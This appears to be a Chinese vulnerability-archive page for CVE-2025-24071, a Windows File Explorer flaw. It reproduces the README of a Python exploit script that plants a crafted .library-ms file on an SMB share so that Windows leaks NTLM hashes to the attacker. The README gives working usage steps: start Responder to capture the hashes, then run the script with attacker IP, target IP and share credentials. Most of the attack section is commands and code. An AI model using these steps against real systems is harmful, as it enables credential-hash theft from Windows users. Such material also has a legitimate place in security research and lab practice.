关联漏洞
标题:
Microsoft Windows File Explorer 信息泄露漏洞
(CVE-2025-24071)
描述:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
描述
Python script to execute CVE-2025-24071
介绍
# CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability (script by SilentExploit)
## 📖 Description
This project detects and demonstrates exploitation of a **Windows File Explorer spoofing vulnerability**.
The issue arises from a **Windows library file (`.library-ms`)** containing a network path, either as a direct attachment or embedded in an archive.
When opened, the file can cause Windows to **leak NTLM hashes** to a remote (potentially malicious) network location.
POC: https://imgur.com/a/hEO83Se
---
## ⚡ Usage
### 1. Start Responder
On your attacking machine, run Responder to capture NTLM hashes:
```bash
sudo responder -I tun0 -wvF
```
2. Run the Script
You can configure the script in two ways:
✅ Option A: Edit defaults (easiest)
Modify the default parameters in the script directly.
```bash
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
```
✅ Option B: Run with CLI parameters
Execute with arguments:
```bash
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>
```
文件快照
[4.0K] /data/pocs/63392f46dd6c08634b480663ec0b75857d20b938
├── [3.9K] cve-2025-24071-exploit.py
└── [1.9K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。